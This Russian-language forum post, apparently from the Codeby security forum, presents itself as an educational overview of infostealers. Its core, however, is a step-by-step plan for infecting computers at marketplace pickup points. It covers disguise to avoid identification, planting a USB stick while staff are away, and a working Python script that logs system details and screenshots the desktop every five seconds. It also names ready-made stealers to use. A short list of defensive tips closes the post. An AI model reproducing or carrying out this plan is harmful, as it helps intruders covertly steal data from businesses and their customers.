Введение
Приветствую всех, кто стремится к глубокому пониманию кибербезопасности! Сегодня мы погрузимся в крайне актуальную и потенциально опасную тему — стиллеры. Что же это такое и как злоумышленники могут использовать их для атак на компании и частных лиц? Подчеркну, что вся информация предоставляется исключительно в образовательных целях, чтобы помочь представителям бизнеса серьезнее взглянуть на защиту своей информации. Запомните ребятки:Неустанно буду это повторять эту фразу, ибо только она передаёт всю картину, как она есть. Стилер - это крыса в вашей системе, тихая, практически невидимая, которая ворует вашу информацию.THE DEMON IS ESPECIALLY POWERFUL, WHEN YOU CAN'TSEE HIM
Стиллеры: невидимая угроза вашей безопасности
Стиллеры представляют собой вредоносное программное обеспечение, разработанное для незаметной кражи конфиденциальных данных, включая пароли, логины, данные банковских карт и другую персональную информацию. Эти вредоносные программы способны скрытно работать на компьютерах и мобильных устройствах, регистрируя вводимые пользователем данные и отправляя их киберпреступникам. Важно знать, что стиллеры могут быть интегрированы в легитимное на первый взгляд программное обеспечение или распространяться через фишинговые рассылки, скомпрометированные веб-сайты и вредоносные загрузки.Запомните эту ключевую мысль: "Враг особенно силен, когда он невидим." Эта фраза как нельзя лучше отражает суть угрозы, которую несут стиллеры — тихие и незаметные "крысы" в вашей системе, похищающие ценную информацию.
Краткий экскурс в историю стиллеров
Первые версии стиллеров появились в начале 2000-х годов и были нацелены на сбор учетных данных из веб-браузеров, таких как логины и пароли. Со временем функциональность стиллеров значительно расширилась. Они научились извлекать данные из различных приложений, включая FTP-клиенты и мессенджеры. Настоящий же расцвет стиллеров пришелся на 2010-е годы. Именно в этот период они стали одной из наиболее распространенных форм вредоносного ПО. Появились такие печально известные образцы, как Zeus и SpyEye, которые использовали сложные техники для обхода систем безопасности и сбора больших объемов данных.
Современные тенденции в мире стиллеров
Несмотря на развитие технологий и совершенствование систем безопасности, стиллеры остаются актуальной угрозой, поскольку человеческий фактор по-прежнему играет ключевую роль в большинстве успешных атак. Можно с уверенностью сказать, что стиллеры никуда не исчезнут, хотя распространять их на пользовательские устройства становится все сложнее. Современные стиллеры могут использовать шифрование для маскировки своей активности и обхода антивирусных программ, однако это лишь временная мера до выхода очередного обновления защиты.
Заражаем Корпорации (теоретически)
Поиск уязвимых систем для проведения успешной атаки начинается с определения потенциальных целей. Очевидно, что такими целями являются компьютеры, и если задуматься, то на ум приходят разнообразные общественные места, включая маркетплейсы. Давайте рассмотрим подробнее алгоритм действий.Хочу поделиться своим опытом о состоянии компьютеров в пунктах выдачи заказов (ПВЗ). Как правило, там установлена "чистая" версия Windows без антивирусного программного обеспечения, но при этом часто сохранены личные страницы пользователей в социальных сетях, таких как ВКонтакте, и аккаунты Google. Откуда мне это известно? В прошлом я работал системным администратором для нескольких индивидуальных предпринимателей, и это наблюдение основано на личном опыте. Впрочем, это не главное.
Аналогичные действия могут быть реализованы и в других общественных местах, например, в цветочных магазинах, кафе и в целом в любых местах скопления людей. Успех зависит исключительно от вашей наблюдательности и умения адаптироваться к ситуации.
- Вы заказываете абсолютно ненужный товар за копейки, будто зубная щётка или набор зубочисток.
- Вы пишите небольшой стилер на Python (Данный стилер будет "отправлять" вам скриншот рабочего стола каждые 5 секунд и файлик с конфигурацией докучи (отправку в тг или на почту сами реализуете, тем более автозапуск, это чисто пример))
Python:
import os
import win32api
import requests
import time
import sys
import platform
from PIL import ImageGrab
def main():
drives = str(win32api.GetLogicalDriveStrings())
drives = str(drives.split('\000')[:-1])
response = requests.get("https://ident.me").text
all_data = "Time: " + time.asctime() + '\n' + "Кодировка ФС: " + sys.getfilesystemencoding() + '\n' + "Cpu: " + platform.processor() + '\n' + "Система: " + platform.system() + ' ' + platform.release() + '\nIP: '+requests.get("https://ident.me").text+'\nДиски:' + str(drives)
file = open(os.getenv("APPDATA") + '\\alldata.txt', "w+")
file.write(all_data)
file.close()
def screenshoot():
while True:
time.sleep(5)
screen = ImageGrab.grab()
screen.save(os.getenv("APPDATA") + '\\sreenshot.jpg')
if __name__ == "__main__":
main()
screenshoot()
- Теперь вы загружаете его на флешку.
- Одеваете новую одежду или ту что не жалко, очки и шляпа будут не лишними, вставляем камешек в ботинок (для изменения нашей походки) и одеваем перчатки
- Идём в ближайший пункт выдачи заказов любого маркетплейса
Важно отметить, что чтобы нам удалось такое провернуть, стол должен иметь не слишком защищённую спину, так чтобы мы могли видеть заднюю часть пк, как правило, пк стоят под столом.
- Показываем QR и пока сотрудник отлучился на склад, вставляем флешку. (Немного социальной инженерии)

Если нет, то здесь есть очень неприятный момент, чтобы запустить файл нужно либо запустить самому, либо чтобы при инпуте флешки exe файл запускался сам (да ещё нужно будет обернуть его через pyinstaller в exe).
Либо, вы можете использовать один из готовых стилеров (строго в образовательных целях):
- Acrid
- ScarletStealer
- SYS01
- sAINT
Если походить и позарожать так несколько пунктов, то можно очень сильно поставить под угрозу чей-то бизнес, я уж молчу о троянах типа того же NjRat. А таких вот столов с открытым доступом к заднему корпусу ПК миллиарды и скорее всего ваш ПВЗ у дома не стал исключением.
Защита от стиллера
Итак, сейчас попробуем защититься от стилера.- Регулярные обновления ПО - это намного важнее, чем может показаться на первый взгляд. Устаревшее ПО и ОС часто содержат уязвимости, которые могут быть использованы стилерами.
- Использование антивируса - Не пожалейте пару кровных и купите надёжный антивирус. В будущем это убережёт вас от большинства проблем.
- Осторожность с соц. сетями - Не скачивайте всё подряд, да да да.
- Настройка брандмауэра - Так даже если зловред попадёт на ваш ПК, то его ждёт поражение в виде брандмауэра.
- Обучение базе - НАУЧИТЕ ПОЛЬЗОВАТЕЛЕЙ КОМПЬЮТЕРНОЙ БЕЗОПАСНОСТИ УЖЕ!!! Когда новые сотрудники приходят на такую работу, зачастую они не умеют пользоваться ПК, из-за чего, заражают корпоративную тачку.
- Ну и в свойствах Windows отключите автозапуск чего-либо по умолчанию.
Заключение
Этот небольшой обзор – лишь первый шаг. Если эта тема вам откликнулась, и вы хотите глубже изучить методы противодействия киберугрозам, оставляйте свои комментарии и пожелания. Что еще вам интересно узнать? Какие аспекты кибербезопасности требуют нашего пристального внимания? Ваши вопросы и предложения станут основой для новых, еще более практичных материалов.На форуме Codeby мы вместе разбираем актуальные вопросы кибербезопасности, от основ пентестинга до тонкостей защиты от новейших уязвимостей. Присоединяйтесь к нашему сообществу, чтобы получать ценные знания, обмениваться опытом и расти в сфере информационной безопасности. Делитесь своими мыслями – вместе мы сделаем интернет безопаснее! Всем отличного дня и безопасного серфинга!
Последнее редактирование: